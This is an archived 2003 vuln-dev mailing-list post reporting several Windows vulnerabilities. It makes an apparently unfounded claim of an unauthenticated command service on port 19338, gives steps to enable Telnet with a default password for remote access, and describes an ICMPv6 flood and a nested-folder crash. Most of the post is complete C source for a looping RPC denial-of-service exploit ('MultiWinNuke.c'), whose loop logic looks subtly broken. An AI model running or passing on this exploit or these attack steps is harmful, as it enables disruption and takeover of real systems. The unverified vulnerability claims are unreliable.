New Secuity Vulnerabilities

From: <mba1(at)012.net.il>
Date: Tue Jun 03 2003 - 18:34:17 EDT

Hello, im Moshe BA from israel a.k.a Trancer and I would like to report 4-5 security bugs\vulnerabilities witch i found. (Note: i'm sorry if my english is a bit bad, i'm an israeli after all)

I've already talked with Dave McKinney via e-mail and he refferd me to this e-mail.
This is the talk we had:

From: Dave McKinney <dm@securityfocus.com> To: mba1@012.net.il <mba1@012.net.il>
Subject: RE: New Secuity Vulnerabilities (fwd) Date: Tue, 3 Jun 2003 14:27:55 -0600 (MDT)

Trancer,

Can you send your report to the vuln-dev mailing list (vuln-dev@securityfocus.com)?

Dave McKinney
Symantec

keyID: BF919DD7
key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7

On Tue, 3 Jun 2003, mba1@012.net.il wrote:

> No you don't, that's what makes it so easy to hack windows server 2003.
And
> that's the reason i want this vulnerability to be reported.
>
> Original Message:
credentials
> > to access the command line interpreter on port 19338?
 

Now, this is the security bugs\vulnerabilities.

---

The first one is two Windows Server 2003 security vulnerabilities

1. Windows 2003 Server has a built in Command Line Interreptor (I don't know if this service is enabled by defult but i've tested this on 9 systems, in 7 of them it worked), which means that you can send commands to it using the HTTP (TCP) method (the web browser) by trying to access the server on port 19338 like this:

http://admin@<ip>:19338/cmd.cgi?cmd=<EnterCommandHere>

That will cause the server to run the command from the $ROOT$ drive. Which may be either C/D/E or any other drive defined by the owner / admin of the machine.
Note that no username or password are requierd.

2. Windows 2003 Server has a built in Telnet service (disabled by defult) that listens to open connections on port 3382. An attacker can exploit the first vulnerability (#1 above) and write this commands there -

"sc config TlntSvr start= auto"
and them:
"net start TlntSvr"

then the attacker has FULL access to the system. Only a password is requierd, and becouse i've just enabled this service, the password is also set to defult -
Password: tlntadmn

Note that if this sevice is already enabled, the password wil be wrong (only if the system admin changed it)
If that service is already enabled with aa other password, the attacker can open a sharing service or any other service that can give him easy access tot he system.

---

The secound one is Windows NT (2000\XP\2003) ICMPv6 Flooding This little Denial of Service attack works jst like ICMP flood but it uses Ping6 tool (in IPv6 enabled Windows OS or an IPv6 enabled *nix OS) This attack is also good becouse Microsoft's Internet Connection Firewall is unable to block IPv6 traffic.
This is maybe a slow attack but effective, it is also depends on the attacker and victim's bandwidth.
An exploit for this can be easly made, and i am working on one.

---

This bug will make Windows XP (all editions) to crash. Creat 122 folders one inside the other and naming them by one char' (like '1' or '0'). now go to one before the last dir' and right click the last folder. hover the mouse over the poped manu and the system will crash. Stupid one but it does crash the system.

---

This is an upgraded exploit witch will DoS and crash a remote machine using the WinNuke.c exploit that exploits - Microsoft Windows RPC Service Denial of Service Vulnerability
I've discoverd that you can STILL DoS and crash it even if it's patched (with an offical M$ patch) aginst it, by simply nuking it a lot of times, and fast.
this is the exploit (MultiWinNuke.c a.k.a FixedWinNuke.c)

### Start MultiWinNuke.c ###

/*

* Microsoft Windows NT RPC Service Denial of Service Vulnerability
*
* Orginal Code By Lion @ 
http://www.cnhonker.com
* Upgraded By Trancer @ 
http://BinaryVision.tech.nu
*
* I have notice that even after a Windows NT system is patched aginst this

vulnerability with an offical M$ update, * an attacker can still DoS that system if he activate this exploit a lot of times, fast.
* So I've upgraded the exploit by looping it and letting you control the times you want to nuke a system

* (with a patched 2000\XP 250-400 times is recommended).
*
* That's it. enjoy :-)

\*

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char sendcode1[] =

  "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00"
  "\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
  "\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f"
  "\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
  "\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00"
  "\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00"
  "\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00";

char sendcode2[] =
  "\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00";

char sendcode3[] =
  "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"   "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00";

char sendcode4[] =

  "\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x3d\x3d\x3d\x3d" 
  "\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d"
  "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
  "\x50\x10\x01\x00\x00\x00\x02\x00";

char sendcode5[] =
  "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"   "\x80\xf9\x00\x00\x00\x00\x02\x00";

char sendcode6[] =
  "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"   "\xb0\xe2\x00\x00\x00\x00\x02\x00";

char sendcode7[] =
  "\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x8f\x00\x00\x00"   "\x60\x15\x00\x00\x00\x00\x02\x00";

char sendcode8[] =
  "\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00";

int main(int argc, char *argv[])
{
  WSADATA wsaData;
  WORD wVersionRequested;
  struct hostent *pTarget;
  struct sockaddr_in sock;
  char *targetip;
  int port,bufsize,times,i;
  SOCKET s;
  char buffer[20480];

  printf("======================= Windows NT Multi RPC Nuke V0.12
======================\r\n");
  printf("=============== Orginal Code By Lion @ 
http://www.cnhonker.com
===============\r\n");

  printf("============= Upgraded By Trancer @ http://BinaryVision.tech.nu ==============\r\n\n");

  if (argc < 2)
  {

    printf("Usage:\r\n");
    printf(" %s    \r\n", argv[0]);
    printf("Exaple: %s 198.167.0.1 135 512 250\r\n", argv[0]);
    printf("PS:\r\n");
    printf(" If target is XP, try 2 times.\r\n");

    exit(1);
  }

  wVersionRequested = MAKEWORD(1, 1);
  if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

  targetip = argv[1];
  port = 135;
  if (argc >= 3) port = atoi(argv[2]);
  bufsize = 512;
  if (argc >= 4) bufsize = atoi(argv[3]);   times = 1;
  if (argc >= 5) times = atoi(argv[4]);

  for (i = 0; i < times; i = i + 1)
  {

    s = socket(AF_INET, SOCK_STREAM, 0);     if(s==INVALID_SOCKET)
    {

      printf("Socket error!\r\n");
      exit(1);

    }

    printf("Resolving Hostnames...\n");
    if ((pTarget = gethostbyname(targetip)) == NULL)     {

      printf("Resolve of %s failed, please try again.\n", argv[1]);
      exit(1);

    }

    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);     sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    printf("Connecting...\n");
    if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))     {

      printf("Couldn't connect to host.\n");
      exit(1);

    }

    printf("Connected!...\n");
    printf("Sending Packets...\n");
    if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)     {

      printf("Error sending nuke Packets\r\n");
      closesocket(s);
      exit(1);

    }

    memset(&buffer, '\x41', 240);
    send(s, buffer, 240, 0);

    send(s, sendcode2, sizeof(sendcode2)-1, 0);     memset(&buffer, '\x42', 5000);
    send(s, buffer, 5000, 0);

    send(s, sendcode3, sizeof(sendcode3)-1, 0);     memset(&buffer, '\x43', 512);
    send(s, buffer, 512, 0);   

    send(s, sendcode4, sizeof(sendcode4)-1, 0);     memset(&buffer, '\x44', 20480);
    send(s, buffer, 20480, 0);

    memset(&buffer, '\x44', 5000);
    send(s, buffer, 5000, 0);

    send(s, sendcode5, sizeof(sendcode5)-1, 0);     memset(&buffer, '\x45', 5000);
    send(s, buffer, 5000, 0);

    send(s, sendcode6, sizeof(sendcode6)-1, 0);     memset(&buffer, '\x46', 5000);
    send(s, buffer, 5000, 0);

    send(s, sendcode7, sizeof(sendcode7)-1, 0);     memset(&buffer, '\x47', 5000);
    send(s, buffer, 5000, 0);

    send(s, sendcode8, sizeof(sendcode8)-1, 0);     memset(&buffer, '\x48', 5000);
    send(s, buffer, 5000, 0);
    i = i + 1;
  }

  if (times < 2)
  {
    printf("Nuked! If target is XP, try a again! :)\r\n");   }
  else
  {
    printf("%s was nuked %s times\r\n", argv[1], argv[4]);   }   

  closesocket(s);
  WSACleanup();
  return 0;
}

### End MultiWinNuke.c ###

That's it. note all of the bugs above were found by me, and i'll be glad if they will be reported.
Trancer

---

mail2web - Check your email from the web at http://mail2web.com/ . Received on Wed Jun 4 12:57:56 2003